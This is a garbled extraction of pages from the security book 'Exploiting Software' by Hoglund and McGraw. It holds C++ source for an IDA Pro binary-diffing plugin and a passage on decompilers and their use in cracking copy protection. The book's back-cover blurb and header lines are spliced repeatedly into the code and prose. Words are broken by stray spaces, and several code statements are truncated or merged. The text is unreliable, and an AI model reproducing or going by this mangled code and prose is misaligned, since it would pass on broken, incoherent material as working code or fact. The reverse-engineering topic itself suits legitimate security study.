How if(INVALID_HANDLE_VALUE d oes sof t w are br eak ? How do== at taFileH) acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What{t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in msg("Failed g S o ft w a re is to loaded w itfile.\n"); h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d open t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . return FALSE; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he } scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem HANDLE aMapH = When net w or k secur it y m ech anisms do n ot w or k CreateFileMapping( aFileH, At t ack pat t er ns NULL, Rev er se engineer in g PAGE_READONLY, Classic at t acks ag ainst serv er soft w ar e 0, Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s

0, NULL );

if(!aMapH) Root k it s {i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Ex p lo soft w ar e. msg("failed to open map of file\n"); return FALSE; }

LPVOID aFilePointer = MapViewOfFileEx( aMapH, •

FILE_MAP_READ, Table of Content s



I ndex

0,Br e ak Code Expl oit ing Softw a re How to By Gr eg Hoglund , Gar y McGr aw

0,

Pub lish er: Addison Wesley 0, Pub Dat e: February 17, 200 4

NULL); I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

DWORD aFileSize = GetFileSize(aFileH, NULL); How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? g_file_size = aFileSize; What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. g_mapped_file = aFilePointer; Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . return TRUE; This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t } Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k This f unct ion t ak es a st r ing of opcodes and scan s t he t arg et f ile f or t h ese by t es. I f t he op cod es c er ns fou ndAtint ack t he pat t ar tget , t he locat ion w ill b e m ark ed as ch anged. This is obv iously a sim ple t echniqu e w or ks in m any cases. Because of t h e pr oblems list ed at t h e beginn in g of t his sect ion, t his app r oa er se engineer in g posit ives. causeRev pr oblem s w it h f alse Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s bool check_target_for_string(ea_t theAddress, DWORD theLen) Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft { w ar e. bool ret = FALSE; if(theLen > 4096) { msg("skipping large buffer\n");

return TRUE; } try { • •

Table of Content s

// I ndex Scan the target binary for the string.

Expl oit ing Softw a re How to Br e ak Code

static By Gr eg Hoglund , Gar y char McGr awg_c[4096]; Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4

// I don't know any other way to copy the data string

I SBN: 0- 20 1- 786 95 -8 Pages: 2 //51out

of the IDA database?!

for(DWORD i=0;i= soft w ar e. { if(0 == memcmp(tp, g_c, theLen)) { // We found a match!

ret = TRUE; break; } if(sz > 1) •

Table of Content s



I ndex

{

Expl oit ing Softw a re How to Br e ak Code

curr = ((char *)tp)+1;

By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley

else Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

{ break; }

How d oes sof t w }are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools canelse be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o { ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st firbreak; st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he } scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t } Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k } At t ack pat t er ns catch(...) Rev er se engineer in g { Classic at t acks ag ainst serv er soft w ar e msg("[!] critical failure."); Sur pr ising at t acks ag ainst clien t soft war e return TRUE; Tech niqu es f or cr aft ing m aliciou s inpu t } The t echn ical det ails of b uf fer ov er f low s return Root k it sret; } Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

This t h r ead f in ds all t h e fu nct ions an d com par es t hem w it h a t arg et binar y :

void __cdecl _test(void *p) { •

Table of Content s



// Wait for start signal. I ndex

Expl oit ing Softw a re How to Br e ak Code

while(g_tempest_state == 0)

By Gr eg Hoglund , Gar y McGr aw

{ Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 Sleep(10); I SBN: 0- 20 1- 786 95 -8

}Pages:

51 2

We call get_func_qty() t o det er min e t he n um ber of fu nct ions in t he load ed b in ary : How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t ///////////////////////////////////// // Enumerate Why sof t w through ar e ex ploitall w illfunctions. con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k ///////////////////////////////////// At t ack pat t er ns int total_functions = get_func_qty(); Rev er se engineer in g = 0; int total_diff_matches Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e We n ow loop ion . We callt getn_func() t o get t he f unct ion st ru ct ur e for each Tech niqut hr es ough f or creach aft ingf un m ct aliciou s inpu The f un ct ion st r uct ur e is of t y pe func_t. Th e ea_t t yp e is kn ow n as " ef fect ive addr ess" and is ac ju st an untsign long We of g etb uf t he arer t addr The echned ical det. ails ferstov f low sess of t he f unct ion and t he en d ad dr ess of t h e fu nct i t he fun ct ion st r uct ur e. We t h en com par e t he sequ en ce of b yt es w it h t h e t ar get bin ary : Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

for(int n=0;nstartEA; What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. ea_t last_location = myea; Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . while((myea endEA) && (myea != BADADDR)) This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t { requested we pshould Why // sof If t w arthe e exuser ploit whas ill con t inue t o bea astop ser ious r oblem return here. if(0 return; When net w== or kg_tempest_state) secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer ea_t nexteain=g get_first_cref_from(myea); Classic at t acks ag = ainst serv er soft w ar e ea_t amloc get_first_cref_to(nextea); Sur prea_t ising amloc2 at t acks ag ainst clien t soft war e = get_next_cref_to(nextea, amloc); Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s // The cref will be the previous instruction, but we Root k it s // also check for multiple references. Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. if((amloc == myea) && (amloc2 == BADADDR)) { // I was getting stuck in loops, so I added this hack // to force an exit to the next function. if(nextea > myea)

{ myea = nextea;

// ---------------------------------------------•

Table of Content s



I ndex

// Uncomment the next two lines to get "cool"

Expl oit ing Softw a re How to Br e ak Code

// scanning effect in the GUI. Looks sweet but slows

By Gr eg Hoglund , Gar y McGr aw

// down the scan. Pub lish er: Addison Wesley Pub Dat e: February 17, 4 // 200 ---------------------------------------------I SBN: 0- 20 1- 786 95 -8

// jumpto(myea);

Pages: 51 2

// refresh_idaview(); } How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are else myea = BADADDR; fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. } Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d else t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . { This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he I en amt f a location. Reference not wlast instruction _OR_ scr ipt k id die t r // eat m ound in m any hack ing bookis s, you ill learn abou t // I have multiple references. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k // Diff from the previous location to here and make a comment At t ack pat t er ns // if we don't match Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e // msg("diffing location... \n"); Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s We p lace a comm ent in ou r dead list ing ( u sing add_long_cmt) if t h e t ar get d oesn' t con t ain ou r o st r in g: Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

bool pause_for_effect = FALSE;

int size = myea - last_location; if(FALSE == check_target_for_string(last_location, size)) { add_long_cmt(last_location, TRUE, •

Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code

"===================================================\

By Gr eg Hoglund , Gar y McGr aw

"= ** This code location differs from the Pub lish er: Addison Wesley

target

Pub Dat e: February 17, 200 4

** =\n" \

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

"==================================================== msg("Found location 0x%08X that didn't match How d oes sof t w are br eak ? How do at ttarget!\n", acker s m ake sof t w ar e br eak on p ur pose? Why are last_location); fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed ttotal_diff_matches++; o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a }re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he if(nextea > myea) scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t { Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem myea = nextea; When net w or k secur it y m ech anisms do n ot w or k } At t ack pat t er ns else myea = BADADDR; Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e // goto next address. Sur pr ising at t acks ag ainst clien t soft war e jumpto(myea); Tech niqu es f or cr aft ing m aliciou s inpu t refresh_idaview(); The t echn ical det ails of b uf fer ov er f low s Root k it s } Ex p lo i t in } g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. } msg("Finished! Found %d locations that diff from the target.\n", total_diff_matches); }

This f unct ion display s a d ialog box pr om pt ing t he user f or a filenam e. This is a n ice- look in g dialo file select ion:



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub * lishGetFilenameDialog(HWND er: Addison Wesley char theParentWnd) Pub Dat e: February 17, 200 4

{

I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

static TCHAR szFile[MAX_PATH] = "\0";

strcpy( szFile, ""); How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. OPENFILENAME OpenFileName; Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om OpenFileName.lStructSize = sizeof (OPENFILENAME); at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . OpenFileName.hwndOwner theParentWnd; This m ust - h ave book m ay shock =y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t OpenFileName.hInstance = GetModuleHandle("diff_scanner.plw"); OpenFileName.lpstrFilter "w00t! Why sof t w ar e ex ploit w ill con t=inue t o be all a serfiles\0*.*\0\0"; ious p r oblem When net w or k secur it y m ech anisms do n ot w or k OpenFileName.lpstrCustomFilter = NULL; At t ack pat t er ns OpenFileName.nMaxCustFilter = 0; Rev er se engineer in g OpenFileName.nFilterIndex = 1; Classic at t acks ag ainst serv er soft w ar e OpenFileName.lpstrFile = szFile; Sur pr ising at t acks ag ainst clien t soft war e OpenFileName.nMaxFile = sizeof(szFile); Tech niqu es f or cr aft ing m aliciou s inpu t OpenFileName.lpstrFileTitle = NULL; The t echn ical det ails of b uf fer ov er f low s OpenFileName.nMaxFileTitle = 0; Root k it s OpenFileName.lpstrInitialDir = NULL; Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft wOpenFileName.lpstrTitle ar e. = "Open"; OpenFileName.nFileOffset = 0; OpenFileName.nFileExtension = 0; OpenFileName.lpstrDefExt = "*.*"; OpenFileName.lCustData = 0;

OpenFileName.lpfnHook OpenFileName.lpTemplateName

= NULL; = NULL;

OpenFileName.Flags = OFN_EXPLORER | OFN_NOCHANGEDIR;

• •

Table of Content s

if(GetOpenFileName( I ndex &OpenFileName ))

Expl oit ing Softw a re How to Br e ak Code

{ Hoglund , Gar y McGr aw By Gr eg return(szFile);

Pub lish er: Addison Wesley

Pub Dat e: February 17, 200 4

}

I SBN: 0- 20 1- 786 95 -8 Pages: 51NULL; 2 return

}

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? As w it thools all "can hombe egruow w e war need t o ides han dle s m essages: What sedn"t odialogs, b reak soft e? DialogProc Th is book p rov t heWind answow er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t sof t w arMyDialogProc(HWND e ex ploit w ill con t inuehDlg, t o be UINT a ser ious p r oblem BOOL Why CALLBACK msg, WPARAM wParam, LPARAM lParam) {

When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns switch(msg) Rev er se engineer in g {

Classic at t acks ag ainst serv er soft w ar e case WM_COMMAND: Sur pr ising at t acks ag ainst clien t soft war e if (LOWORD(wParam) == IDC_BROWSE) Tech niqu es f or cr aft ing m aliciou s inpu t { The t echn ical det ails of b uf fer ov er f low s char *p = GetFilenameDialog(hDlg); Root k it s SetDlgItemText(hDlg, IDC_EDIT_FILENAME, p); Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e. } if (LOWORD(wParam) == IDC_START) { char filename[255]; GetDlgItemText(hDlg, IDC_EDIT_FILENAME, filename, 254);

if(0 == strlen(filename)) { MessageBox(hDlg, "You have not selected a target file", "Try again", MB_OK); •

Table of Content s



I ndex

}

Expl oit ing Softw a re How to Br e ak Code

else By Gr eg Hoglund , Gar y McGr aw

if(load_file(filename))

{ Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

g_tempest_state = 1;

EnableWindow( GetDlgItem(hDlg, IDC_START), FALSE); }

else How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are { ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? fir ew alls, int ru sion det What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. MessageBox(hDlg, "The target file could not be opened", "Err Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s MB_OK); t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . } This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r } eat m en t f ound in m any hack ing book s, you w ill learn abou t if (LOWORD(wParam) == IDC_STOP) Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem { When net w or k secur it y m ech anisms do n ot w or k g_tempest_state = 0; At t ack pat t er ns } Rev er se engineer in g (LOWORD(wParam) ==w ar IDOK || LOWORD(wParam) == IDCANCEL) Classic atif t acks ag ainst serv er soft e Sur pr ising{ at t acks ag ainst clien t soft war e Tech niqu es f orif(LOWORD(wParam) cr aft ing m aliciou s inpu ==t IDOK) The t echn ical det { ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak } soft w ar e. EndDialog(hDlg, LOWORD(wParam)); return TRUE; } break;

default: break; } return FALSE; •

Table of Content s



I ndex

}

Expl oit ing Softw a re How to Br e ak Code

void __cdecl _test2(void *p) By Gr eg Hoglund , Gar y McGr aw

{ Pub lish er: Addison Wesley

DialogBox( Pub Dat e: February GetModuleHandle("diff_scanner.plw"), 17, 200 4

MAKEINTRESOURCE(IDD_DIALOG1)

I SBN: 0- 20 1- 786 95 -8

MyDialogProc); Pages: 51 2

}

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are //-------------------------------------------------------------------------fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. // Ex t in gplugin S o ft w a method. re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d // p lo iThe t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . // This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he // This is the main function of plugin. scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t // //

Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem It will be called when the user selects the plugin. When net w or k secur it y m ech anisms do n ot w or k

// // // // //

At t ack pat t er ns Arg - the input argument. It can be specified in the Rev er se engineer in g plugins.cfg file. The default is zero. Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s

Root k it s The run f un ct ion is called w hen t he u ser act iv at es t he p lu gin. I n t his case w e st ar t a couple t h rea post e is t o ftilled he log : Ex p loai tshor in g tSmessag o ft w a re witw h int hdow e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

void run(int arg) { // Testing. msg("starting diff scanner plugin\n"); • •

Table of Content s

_beginthread(_test, 0, NULL); I ndex

Expl oit ing Softw a re How to Br e ak Code

_beginthread(_test2, 0, NULL);

By Gr eg Hoglund , Gar y McGr aw

} Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

These global dat a it em s ar e used by I DA t o d isplay in for m at ion ab out t he p lu gin.

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om //-------------------------------------------------------------------------at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . char comment[] = "Diff Scanner Plugin, written by Greg Hoglund (www.rootkit.com) This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t char help[] = "A plugin find binary Why sof t w arto e ex ploit diffs w ill conin t inue t o be code\n" a ser ious p r oblem "\n" When net w or k secur it y m ech anisms do n ot w or k "This At t ack module pat t er nshighlights code locations that have changed.\n" Rev er se engineer in g "\n"; Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e //-------------------------------------------------------------------------Tech niqu es f or cr aft ing m aliciou s inpu t // This is the preferred name of the plugin module in the menu system. The t echn ical det ails of b uf fer ov er f low s // The preferred name may be overridden in the plugins.cfg file. Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak char wanted_name[] = "Diff Scanner"; soft w ar e.

// This is the preferred hot key for the plugin module. // The preferred hot key may be overridden in the plugins.cfg file. // Note: IDA won't tell you if the hot key is not correct.

//

It will just disable the hot key.

char wanted_hotkey[] = "Alt-0"; //-------------------------------------------------------------------------•

Table of Content s

// •

I ndex

Expl oit ing Softw a re How to Br e ak Code

//

PLUGIN DESCRIPTION BLOCK

By Gr eg Hoglund , Gar y McGr aw

// Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 //-------------------------------------------------------------------------I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

extern "C" plugin_t PLUGIN = { IDP_INTERFACE_VERSION, How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are 0, // Plugin flags. fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. init, // Initialize. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . term, // Terminate. This pointer may be NULL. This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t run, // Invoke plugin. Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k comment, // Long comment about the plugin At t ack pat t er ns // It could appear in the status line Rev er se engineer in g // or as a hint. Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e help, Multiline Tech niqu es f or cr// aft ing m aliciou shelp inpu tabout the plugin The t echn ical det ails of b uf fer ov er f low s wanted_name, Root k it s

// The preferred short name of the plugin

Ex p lo i t in g S o ft w a re // is f illed h t h e t ools, conkey ceptto s, and ow ledg e necessar y t o b reak wanted_hotkey The wit preferred hot run kn the plugin soft w ar e. };

Decompiling and Disassembling Software Decomp ilat ion is t h e pr ocess of t r ansf orm ing a binar y execut ab le—t h at is, a com piled pr ogr am —int o a h ig her level sy mb olic lan guag e t hat is easier f or hu man s t o u nder st and. Usu ally t his m ean s t ur nin g a pr ogr am ex ecut able int o sou rce code in a lan guag e like C. Most •syst em s for decom Table ofpiling Contentcan' s t d ir ect ly con ver t p r ogr ams in t o 1 00% sour ce cod e. I n st ead , •t hey u su ally Ipndex r ovide an " alm ost t here" kind of int er m ed iat e r ep resen t at ion. Many r ev er se Expl ing sSoftw re How Br e ak Code comoit piler ar e aact uallytodisassem blers t hat pr ovid e a d um p of t he m achine code t hat m ak es a prGr ogr w or k, Gar . y McGr aw By egam Hoglund Pr obably t he best d ecom piler available t o t he pub lic is called I DA- Pr o. I DA st ar t s w it h a Pub lish er: Addison Wesley disassem bly of pr ogr am cod e and t hen analy zes pr ogr am flow , v ar iables, and fun ct ion calls. 17, 200 4 I DAPub is hDat are:d February t o use and r equir es adv anced k now ledge of pr ogr am behav ior , but it s t echnical I SBN: 020 1786 95 -8 level r eflect s t he t r ue nat ur e of r ever se en gineering . I DA su pplies a com plet e API f or Pages: m anipu lat in51 g 2t he pr og ram dat abase so t hat u ser s can perf or m cust om analy sis. Ot h er t ools ex ist as w ell. A closed - sour ce b ut fr ee pr ogr am called REC p r ovides 1 00% C sour ce cod e r ecov er y f or som e kin ds of bin ary ex ecu t ables. An ot her com mer cial disassem bler is called WDASM. Th er e ar e sever al decomp iler s f or Jav a by t e code t hat rend er Java sour ce code d( aoes pr ocess f ar br less plicat an d secom piling ach code nt el chips) Th ese How sof t w are eakcom ? How doedattthacker m ake sof t m w ar e ine br eak on f porurI pose? Why . are syst em s t end t o b e v er y accur at e, ev en w hen sim ple obf uscat ion t echniq ues hav e been fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? app lied. There en -t sour ce prsoft oject s e? in tTh hisis space wides ell, wh int er What t ools can are be uop sed o b reak war book pas rov t heichansw erest s. ed r ead er s can look up . I t is alw ay s a g ood id ea t o k eep sever al decom piler s in y our t oolbox if y ou ar e int er est p rog s. amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Ex p lo i t ed in ginS u o nder ft w astreanding is loaded wram it h ex t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Decomp ex t ensively in tat het acks com put u nder gr ound at t ack , yiler ou smar ue st used fir st lear n h ow r eal areerreally carr ied out ot . br eak copy pr ot ect ion sch em es. This h as giv en t h e t ools an und eserv ed black ey e. I t is in t er est in g t o n ot e t hat com put er -hhack andmsoft ar e pir acy w er eit lar gely en t in he Get ear ly day s of t h et he This m ust aveing book ay w shock y ou—and will cer independ t ainly educat e ytou. t ing bey ond com put er u nder gr ound . Hacking d ev elop ed in UNI X en vir onm ent s, w her e soft w ar e w as f ree scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t and sour ce code w as av ailab le, rend er ing decom pilin g som ew hat unnecessar y. Soft w ar e pir acy, on t he ot her h and, was main ly developed t o cr ack com pu t er gam es, and hence w as conf inWhy ed msof ainly t w ar t oe Apples, ex ploit w DOS, ill con and t inue Window t o be s,a fser or ious w hich p rsour oblem ce code w as u su ally not av ailab le. Th e v ir u s indu st r y d ev eloped along side t h e pir acy m ovem en t . I n t he lat e 1 990 s, When net w or k secur d it isciplines y m ech anisms do as n otmwor oreknet w or k sof t w ar e became available f or t he hacking an d cr acking m er ged Wind ows and hack er s learn ed h ow t o br eak W in dow s soft w ar e. The cu rr ent focus of Atpilin t ackg pat t erifns decom is sh t ing fr om cr ackin g copy pr ot ect ion t o au dit ing soft w ar e f or exp loit ab le bu gs. The sam e old t r ick s ar e being used ag ain, b ut in a new env ir on ment . Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

